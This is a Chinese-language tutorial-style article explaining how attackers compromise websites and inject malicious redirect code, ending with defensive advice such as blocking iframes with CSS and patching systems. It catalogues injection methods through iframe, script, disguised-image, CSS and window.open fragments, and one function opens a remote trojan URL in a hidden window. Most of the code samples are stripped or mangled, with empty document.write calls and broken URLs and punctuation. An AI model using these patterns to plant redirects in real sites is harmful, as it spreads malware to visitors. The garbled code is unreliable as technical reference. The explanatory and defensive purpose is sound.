揭秘黑客们是怎么挂马的（常见的网页挂马方式）

　　揭秘黑客们是怎么挂马的（常见的网页挂马方式）所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day，等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库备份恢复或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP，然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒。下面就让我们来看看几种常见的挂马网站。
　　（1）iframe框架挂马
　　在网页上增加一行挂马的程序，例如：
　　这种嵌入是的挂马非常常见，在Google中搜索发现的可能还有木马的网页，一般都是被这种方式挂马。这行语句就是在网页打开的时候，同时打开另外一个网页，当然这个网页可能包含大量的木马，也可能仅仅是为了骗取流量。
　　如果我们的网页不使用iframe，我们可以屏蔽iframe属性，这样，即使网页被iframe挂马，也不会伤害到访问网站的用户。
　　【原理】：
　　IE5及其以后版本支持在CSS中使用expression，用来把CSS属性和javascript脚本关联起来，这里的CSS属性可以是元素固有的属性，也可以是自定义属性。
　　我们在网页中增加如下的代码即可屏蔽iframe属性：
　　iframe｛a：expression（this。src’about：blank’，this。outerHTML）；｝
　　iframe也可以采用加密的方式挂马，例如下面的代码：
　　（2）script挂马
　　通过script的调用来挂马，可以挂直接的html文件，也可以挂js文件，可以明文挂马，为了躲避追查，也有加密挂马的形式，形式各异，千差万别，主要方式如下：
　　这是一个加密的挂马语句；
　　2。1htm文件挂马：
　　通过上传一个木马文件（x。htm）挂马，代码如下：
　　document。write（
　　）
　　document。write（）
　　document。write（）
　　htm挂马代码：
　　2。2js文件挂马
　　通过上传一个木马文件（x。js）挂马，代码如下：
　　document。write（）；
　　JS挂马代码：
　　当然也可以挂互联网上任何一台机器的x。js文件；
　　2。3js变形加密
　　（3）图片伪装挂马
　　随着防毒技术的发展，图片木马技术逃避杀毒监视的新技术，攻击者将类似：http：www。xxx。comx。htm中的木马代码植入到x。gif图片文
　　件中，这些嵌入代码的图片都可以用工具生成。图片木马生成后，再利用代码调用执行，是比较新颖的一种挂马隐蔽方法，实例代码如：
　　当用户打开http：www。x。comx。htm是，显示给用户的是http：www。x。comx。jpg，而http：www。x。comx。htm网页代码也随之运行。
　　（4）其它的挂马方式
　　4。1body挂马
　　也可以在css的body中挂马
　　body｛
　　backgroundimage：url（‘javascript：document。write（）’）｝
　　4。2隐蔽挂马
　　top。document。body。innerHTMLtop。document。body。innerHTML
　　‘’；
　　4。3java的open函数挂马
　　直接调用：
　　window。open（x。htm，，toolbarno，locationno，directoriesno，statusno，menubarno，scrollbarsno，width1，height1）；
　　欺骗调用：
　　页面要显示的内容
　　functionwwwacom（）
　　｛
　　varurl网马地址；
　　open（url，NewWindow，toolbarno，locationno，directoriesno，statusno，menubarno，scrollbarsno，resizableno，copyhistoryyes，w
　　idth800，height600，left10，top10）；
　　｝
　　4。4伪装调用：
　　形形色色的网页挂马，代码都十分简单，所以，互联网木马想要传播，就会不停的开发新的挂马方式，不停的加密隐藏自己，这样才能逃过各种安全软件的眼睛。其实，看看上文，很多语句都是编程常用的代码，只是使用的目的不一样罢了，了解了网页挂马的原理和方法，再防范网页挂马就容易多了。
　　带木马的网页主要包括两种类型：一种自己本身就是木马网站，所有的页面都有木马，另一种是正常的网站，由于管理不善，被挂马，成为木马网站的一个中转站，看看google中这样的网站何其多，可能很多站长现在还不知道，呵呵，多学习学习吧，站长可不是那么好当的。
　　不过，仅仅有了网络挂马的代码，也不一定一定能传播木马，只要我们加强防范，不让我们的网页被挂马，甚至，即使被挂马了，打开了木马网页，我们的系统没有漏洞，木马网页也同样不能发挥作用的。所以，最重要的安全防范方式就是定期给系统打补丁，几乎所有的木马网页都无法发挥作用了。